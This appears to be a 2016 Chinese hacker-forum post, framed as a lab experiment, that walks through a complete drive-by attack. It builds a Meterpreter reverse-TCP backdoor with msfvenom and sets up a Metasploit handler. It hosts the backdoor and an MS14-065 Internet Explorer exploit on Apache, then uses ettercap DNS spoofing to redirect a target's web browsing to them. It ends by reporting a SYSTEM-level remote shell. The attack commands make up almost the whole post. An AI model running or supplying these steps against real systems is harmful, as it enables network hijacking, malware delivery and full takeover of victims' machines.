搜索
查看: 402|回复: 0

系统服务渗透实验—msf+ms14-065+ettercap

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2016-1-20 22:40:57 | 显示全部楼层 |阅读模式

1、生成后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.142 LPORT=6666 -f exe -o /sss.exe




2、启动msf,选择exp:use exploit/multi/handler




3、设置负荷:set payload windows/meterpreter/reverse_tcp

show options 查看需要设置的参数




4、set LHOST设置IP




5、set LPORT设置监听端口





6、再show options看一下参数是否设置正确




7、然后执行exploit




8、Msf里面设置完成过后我们设置dns劫持,把之前生成的后门放到/var/www/目录下面,然后打开K8 生成EXP




9、再把EXP复制到/var/www/目录下面





10、重启apache:

service apache2 restart





11、修改ettercap DNS劫持插件的参数:leafpad /etc/ettercap/etter.dns




12、然后执行以下命令启动DNS劫持

DNS劫持:ettercap -T -q -i xxxx -P dns_spoof // //




13、靶机打开IE浏览器*.com的所以网站全部被劫持




14、回到msf查看是否上线





已经上线,并且是system权限



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
您可以更新记录, 让好友们知道您在做什么...
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表